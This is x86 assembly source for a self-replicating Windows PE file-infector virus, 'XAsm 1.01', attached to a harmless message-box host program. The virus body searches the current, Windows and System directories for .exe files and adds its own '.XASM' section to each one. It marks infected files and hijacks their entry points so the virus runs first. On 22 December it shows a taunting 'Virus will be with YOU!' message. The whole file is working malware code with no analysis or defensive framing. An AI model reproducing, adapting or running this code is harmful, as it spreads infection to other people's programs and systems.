;==============================================
; XAsm Version 1.01
;==============================================
; PE Virus * ^_^ * , too easy
;==============================================
; not keep in memory,but when set the debug
; mode is false,the virus will infect PE exe
; files in %WINDOWS% & %SYSTEM% Directory!
;==============================================
; host program
.386
locals
jumps
.model flat,stdcall
include ..\Include\win32.inc
;Defined the Marco
TRUE = 1
FALSE = 0
;===============================================
; Debug Mode or Release Mode
;===============================================
DEBUG =TRUE
;===============================================
L equ <LARGE>
;define some functions
extrn GetModuleHandleA : proc
extrn MessageBoxA : proc
extrn ExitProcess : proc
;host body
.data
szMsg db 'XAsm Ready!',0
szCaption db 'Message',0
.code
host_start:
;-----------------------------------------------------------------------
; Host stub (benign carrier): GetModuleHandleA(NULL), then
; MessageBoxA(NULL, szMsg, szCaption, 1000h), then ExitProcess(0).
; stdcall: arguments are pushed right-to-left; the imports come from
; the extrn declarations above. `L` is the LARGE equate defined above.
;-----------------------------------------------------------------------
; get module handle ( call kernel32.dll )
push L 0                                ; hModule = NULL
call GetModuleHandleA                   ; return value in eax is not used below
; show message
push 1000h                              ; uType = 1000h (MB_SYSTEMMODAL)
lea eax,szCaption
push eax                                ; lpCaption
lea eax,szMsg
push eax                                ; lpText
push 0                                  ; hWnd = NULL
call MessageBoxA
; exit host
push L 0                                ; uExitCode = 0
call ExitProcess                        ; does not return
ends
;=====================================================
; my cute virus from here
;=====================================================
vseg segment para use32 'XASM'
assume cs : vseg
; virus body
vstart:
mov ecx,ebp ; save the ebp
mov edx,esp ; save the esp
call reloc
reloc:
pop ebp
mov eax,ebp
sub ebp,offset reloc ; get offset
sub eax,reloc-vstart
sub eax,oldoffset[ebp] ; calculate jump back to host address
mov jmpbacktemp[ebp],eax ; save jump back host address
mov oldesp[ebp],edx ; save old esp
mov oldebp[ebp],ecx ; save old ebp
; begin to cmp wether kernel32.dll in Memory ?
mov eax,krnl32[ebp]
cmp dword ptr [eax],081EC8B55h ; if in memory ?
jnz run_host ; no in then go to run host
; cmp Okey! the kernel32.dll has been loaded in memory !
lea eax,CurrentDir[ebp]
push eax
push L 256
call getcurrentdirectory
mov RestoreDir[ebp],eax
jmp start_find_file
; Get Window dir
Get_Window_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getwindowdirectory
mov windir[ebp],1
;
; for debug: change system to d:\windows
IF DEBUG
inc byte ptr DirTemp[ebp]
ENDIF
;
jmp set_dir
; Get Windows\System dir
Get_System_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getsystemdirectory
mov sysdir[ebp],1
;
; for debug: change system to d:\windows\system
IF DEBUG
inc byte ptr DirTemp[ebp]
ENDIF
;
set_dir:
lea eax,DirTemp[ebp]
push eax
call setcurrentdirectory
start_find_file:
lea eax,WIN32_FIND_DATA[ebp]
push eax
lea eax,findfilter[ebp]
push eax
call findfirstfile
mov searchhandle[ebp],eax
cmp eax,-1
jz run_host
jmp infectfile
no_aim:
push filehandle[ebp]
call closehandle
gonext:
lea eax,WIN32_FIND_DATA[ebp]
push eax
push searchhandle[ebp]
call findnextfile
or eax,eax
jnz infectfile
cmp windir[ebp],1
jnz Get_Window_Dir
cmp sysdir[ebp],1
jnz Get_System_Dir
jmp run_host
infectfile:
push 0 ; temphandle
push fileattr[ebp] ; file attrib
push 3 ; file exist
push 0 ; secturity NULL
push 0 ; share mode
push 80000000h+40000000h; read + write
lea eax,fullname[ebp]
push eax ; pWin32_find_data struct
call createfile
mov filehandle[ebp],eax
cmp eax,-1
jz gonext
; read offset of pe sign
push 0
push 0
push 3ch
push filehandle[ebp]
call setfilepointer
; read [3c] dword pe offset
push 0
lea eax,bytesread[ebp]
push eax
push 4
lea eax,peoffset[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz gonext
; set file pointer to pe offset
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; read pe header
push 0
lea eax,bytesread[ebp]
push eax
push 58h
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
; check file
cmp dword ptr peheader[ebp],4550h
jnz no_aim ; if PE format? yes then infect
cmp word ptr peheader[ebp+1ah],0AEAEh
jz no_aim ; if infected? yes then find next
; check ok will be infect it!
; go back the pe offset and read the whole pe header
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
mov word ptr peheader[ebp+1ah],0AEAEh ; set infected flag
;local the obj table entry
xor eax,eax
mov ax,NtHeaderSize[ebp]
add eax,18h
mov objtableoffset[ebp],eax
lea eax,peheader[ebp]
add objtableoffset[ebp],eax
;end local
xor eax,eax
xor edx,edx
mov ax,numobj[ebp]
mov ecx,40
mul ecx ; edx: eax save the offset of my section entry
mov esi,objtableoffset[ebp]
add esi,eax ; esi save the my offset of section entry in memory
inc word ptr numobj[ebp]
lea edi,newobject[ebp] ;
;
; esi: the offset of my section entry in memory
; edi: the offset of newobject made by me
;
;calculate the My section RAV value
mov eax,[esi-40+8] ; virtual size of last section
add eax,[esi-40+12] ; add virtual entry of last section
; align with the align mode
mov ecx,objalign[ebp]
xor edx,edx
div ecx
inc eax
mul ecx
mov RVA[ebp],eax
; set the virtual size
xor edx,edx
mov eax,vend-vstart+1000h
div ecx
inc eax
mul ecx
mov virtualsize[ebp],eax
;set the physical size
mov ecx,filealign[ebp]
xor edx,edx
mov eax,static_data_end-vstart
div ecx
inc eax
mul ecx
mov physicalsize[ebp],eax
;calculate the physical offset
mov eax,[esi-40+16]
add eax,[esi-40+20]
xor edx,edx
div ecx
inc eax
mul ecx
mov physicaloffset[ebp],eax
;Update the imagesize
mov ecx,objalign[ebp]
mov eax,imagesize[ebp]
add eax,vstart-vend+1000h
div ecx
inc eax
mul ecx
mov imagesize[ebp],eax
; copy the new object to pe header
xchg esi,edi
mov ecx,10
rep movsd
; calculate the RAV , to make my cute virus run first! ^o^
mov eax,RVA[ebp]
mov ebx,entrypointRVA[ebp]
mov entrypointRVA[ebp],eax
sub eax,ebx
mov oldoffset[ebp],eax
; go back to the pe start
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; write the modifid PE header
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call writefile
; set file pointer to the my section's physical entry address
; and write my cute virus into file
push 0
push 0
push physicaloffset[ebp]
push filehandle[ebp]
call setfilepointer
; begin to write
push 0
lea eax,bytesread[ebp]
push eax
push static_data_end-vstart+1
lea eax,vstart[ebp]
push eax
push filehandle[ebp]
call writefile
;close handle
push filehandle[ebp]
call closehandle
run_host:
;
; check trigger?
lea eax,systime[ebp]
push eax
call gettime
cmp word ptr month[ebp],12
jnz no_trigger
cmp word ptr day[ebp],22
jnz no_trigger
; show message (trigger???) kinding man? ^o^
mov eax,user[ebp]
cmp dword ptr [eax],08BEC8B55h
jnz no_trigger
push 1000h
lea eax,szvCaption[ebp]
push eax
lea eax,szvMsg[ebp]
push eax
push 0
call msgbox
no_trigger:
;
; return the host
cmp RestoreDir[ebp],0
jz go_host
lea eax,CurrentDir[ebp]
push eax
call setcurrentdirectory
go_host:
mov eax,jmpbacktemp[ebp]
mov esp,oldesp[ebp]
mov ebp,oldebp[ebp]
jmp eax
;
;
;call_table
msgbox:
mov jumptemp[ebp],0BFF541BAh
jmp jumptemp[ebp]
findfirstfile:
mov jumptemp[ebp],0BFF77BD7h
jmp jumptemp[ebp]
findnextfile:
mov jumptemp[ebp],0BFF77C0Fh
jmp jumptemp[ebp]
closehandle:
mov jumptemp[ebp],0BFF7E2D9h
jmp jumptemp[ebp]
createfile:
mov jumptemp[ebp],0BFF77B5Bh
jmp jumptemp[ebp]
setfilepointer:
mov jumptemp[ebp],0BFF771BBh
jmp jumptemp[ebp]
readfile:
mov jumptemp[ebp],0BFF770B9h
jmp jumptemp[ebp]
writefile:
mov jumptemp[ebp],0BFF77051h
jmp jumptemp[ebp]
gettime:
mov jumptemp[ebp],0BFFA1372h
jmp jumptemp[ebp]
getcurrentdirectory:
mov jumptemp[ebp],0BFF77A55h
jmp jumptemp[ebp]
getsystemdirectory:
mov jumptemp[ebp],0BFF779C2h
jmp jumptemp[ebp]
getwindowdirectory:
mov jumptemp[ebp],0BFF779F8h
jmp jumptemp[ebp]
setcurrentdirectory:
mov jumptemp[ebp],0BFF77A2Eh
jmp jumptemp[ebp]
;
;======================================================================
; static data for need
;
static_data_start:
;
oldoffset dd 2000h
jmpbacktemp dd 0
krnl32 dd 0BFF84E4Dh
user dd 0BFF53FF0h
findfilter db '*.exe',0
bytesread dd 0
peoffset dd 0
objtableoffset dd 0
szvCaption db 'Note For You',0
szvMsg db ' Happy Day, isnt it? Be careful!',0dh,0ah
db 'Virus will be with YOU! ^o^',0dh,0ah,0dh,0ah
db ' From [ XASM ] Ver 1.01',0
;
; static struct
;new object
newobject:
oname db '.XASM',0,0,0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reversed dd 0,0,0
objectflags db 40h,0,0,0c0h ; code flag
; end of new object
;
static_data_end:
;
; dynanic data for need
;
memory_data_start:
; -
windir dd 0
sysdir dd 0
RestoreDir dd 0
oldesp dd 0
oldebp dd 0
searchhandle dd 0
filehandle dd 0
jumptemp dd 0
CurrentDir db 256 dup (0)
DirTemp db 256 dup (0)
; -
; some structs
; -
; SYSTIME struct
systime:
year dw 0
month dw 0
dayofweek dw 0
day dw 0
dw 0,0,0,0
; end of struct
;here defined WIN32_FIND_DATA struct
WIN32_FIND_DATA:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 256 dup(0)
;end of WIN32_FIND_DATA struct
;defined pe header buffer
peheader:
signature dd 0 ; sign of PE: 'PE00'
cputype dw 0 ; cpu type sign
numobj dw 0 ; num of Object
db 3*4 dup (0) ; no use for us
NtHeaderSize dw 0 ; option header size
Flags dw 0 ; characteristics
db 4*4 dup (0) ; no use
entrypointRVA dd 0 ; entry point
db 3*4 dup (0) ; no use
objalign dd 0 ; objects align mode
filealign dd 0 ; file align mode
db 4*4 dup (0) ; no use
imagesize dd 0 ; image size
headersize dd 0 ; image header size
;
vend:
db 1000h dup(0) ; the other pe header bytes will read to here
; -
memory_data_end:
;
ends
end vstart